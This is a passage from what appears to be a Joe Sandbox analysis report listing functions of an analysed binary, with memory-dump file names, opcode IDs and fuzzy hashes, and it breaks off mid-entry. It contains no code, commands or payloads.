                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d0dcbab18ec4284ec34a5c32407e6b7425f473321a9dde194cdbbc869946cebb
                                        • Instruction ID: a75937c312dc708b13fb23334a94fc2e12a777c46c3daf14116df3646dac7a90
                                        • Opcode Fuzzy Hash: d0dcbab18ec4284ec34a5c32407e6b7425f473321a9dde194cdbbc869946cebb
                                        • Instruction Fuzzy Hash: 11D12AB01083818FD3548F55C5A472BBFE0FF95748F18895EE8D94B391C7BA8A48DB92
                                        Function 007F45A8 Relevance: .3, Instructions: 291COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                        • Instruction ID: c587ac717358c48fc85cdf602b8421be32d42606c87a88b61e3ccb8950936ecd
                                        • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                        • Instruction Fuzzy Hash: 12B19372A083555BD308CF25C85136BF7E2EFC8310F1AC93EE99997391D778D9419A82
                                        Function 007E1D78 Relevance: .3, Instructions: 291COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                        • Instruction ID: ff3ad3518ce824ec3fc2169ef15226938a39a327820d6cfd1e7ebdf882e5927f
                                        • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                        • Instruction Fuzzy Hash: 3CB1B172A093519BD308CF25C49136BF7E2EFCC310F1AC93EA89997291D778D9419A82
                                        Function 007E2138 Relevance: .3, Instructions: 284COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                        • Instruction ID: be05d07d203ece13f332318608a29aad64e82bfd1a81081d673911cf43a20aa6
                                        • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                        • Instruction Fuzzy Hash: D1B14A71A093558FD706EE3EC481215F7E5BFEA280F51C72EE895B7662EB31E8818740
                                        Function 00821EE8 Relevance: .3, Instructions: 274COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                        • Instruction ID: 9196dbcfa168cc6a9df104156e67196851fdd8d468500c31af0e02504863ed7a
                                        • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                        • Instruction Fuzzy Hash: 7E91C371A00235ABDF14CE68EC80BBAB3A0FF55300F554565E914EB286D732ED85C7A2
                                        Function 008396FD Relevance: .3, Instructions: 269COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                        • Instruction ID: 478e408eeece189eb1566c426a1580b1f7f78840804e70caf6a997d15220faef
                                        • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                        • Instruction Fuzzy Hash: AEB11A316106099FDB15CF28C48AB657BA1FF85364F29865CE8D9CF2A2C375D991CB80
                                        Function 0080B198 Relevance: .3, Instructions: 268COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                        • Instruction ID: 94d89d48ead8b5b682260b232e440373dc2c6c55b886ce6fcaaed695790cab26
                                        • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                        • Instruction Fuzzy Hash: A0C14A75A04B1A8FC715DF28C08045AB7F2FF88350F258A6DE8999B721D731E996CF81
                                        Function 0081D5A8 Relevance: .3, Instructions: 258COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                        • Instruction ID: 5b31ac2234037c0e238853b5cf024e35ba4d51afd313c3a285a2adc016054031
                                        • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                        • Instruction Fuzzy Hash: 3B9158319287946AEB168B3CCC417BAB798FFE6350F14C72AF998B2491FB7185C18345
                                        Function 00B09BDE Relevance: .2, Instructions: 249COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c009f72429bb7e0b004943efe85be61bf3ab7305df2c9d1f4204ad0cd4c4838f
                                        • Instruction ID: 6443d4956d1668c4d3749b3716b10680ed04763790aee8a2f1ea1b8d8271e76c
                                        • Opcode Fuzzy Hash: c009f72429bb7e0b004943efe85be61bf3ab7305df2c9d1f4204ad0cd4c4838f
                                        • Instruction Fuzzy Hash: BB7125F3D082249FE3146E29DC4573ABBE9DBD4710F2A863DEAC893344E9755C0186C6
                                        Function 0082D39E Relevance: .2, Instructions: 242COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                        • Instruction ID: a1cc8334da7ffb9c75be3c5a2743ce2796ae9d9b6f1e1b45e2c2c82cade02984
                                        • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                        • Instruction Fuzzy Hash: 86A13072900B29CBEB19CF55DCC5A5ABBB1FB54314F14C22AD41AE72A0D334A984CF94
                                        Function 007F4288 Relevance: .2, Instructions: 240COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                        • Instruction ID: 48da4c0f7b7a848fe37d241ec4e32128b62fd79eb9e0bec8438fd8a4bb3d2763
                                        • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                        • Instruction Fuzzy Hash: 5EA16D72E083559BD308CF25C89075BF7E2EFC8710F1ACA3DA8999B254D774E9419B82
                                        Function 00ACC03C Relevance: .2, Instructions: 198COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
